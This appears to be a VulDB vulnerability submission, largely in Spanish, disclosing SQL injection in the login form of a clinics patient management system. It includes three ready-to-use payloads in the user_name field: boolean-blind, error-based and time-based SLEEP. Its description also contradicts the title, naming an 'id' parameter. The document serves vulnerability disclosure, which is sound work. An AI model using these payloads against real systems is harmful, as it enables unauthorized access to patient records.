| Título | Sql injection exists in username parameter of clinics patient management system |
|---|
| Descripción | SQL injection vulnerability exists in id parameter of index.php file of clinics patient management system.Using sqlmap to inject it, you can get the result of Boolean blind injection, which means that an ordinary user can obtain all the information in the database
Payload:user_name=admin' AND 7611=7611 AND 'UDzF'='UDzF&password=admin123&login=
or user_name=admin' AND GTID_SUBSET(CONCAT(0x716a7a7171,(SELECT (ELT(7705=7705,1))),0x717a6b6a71),7705) AND 'iREO'='iREO&password=admin123&login=
or user_name=admin' AND (SELECT 6807 FROM (SELECT(SLEEP(5)))kKcA) AND 'YvzK'='YvzK&password=admin123&login= |
|---|
| Fuente | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/clinics%20patient%20management%20system/clinics-patient-management-system%20vlun1.pdf |
|---|
| Usuario | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Sumisión | 2023-02-25 04:38 (hace 3 años) |
|---|
| Moderación | 2023-02-25 08:51 (4 hours later) |
|---|
| Estado | Duplicado |
|---|
| Entrada de VulDB | 207847 [SourceCodester Clinics Patient Management System Login index.php user_name inyección SQL] |
|---|
| Puntos | 0 |
|---|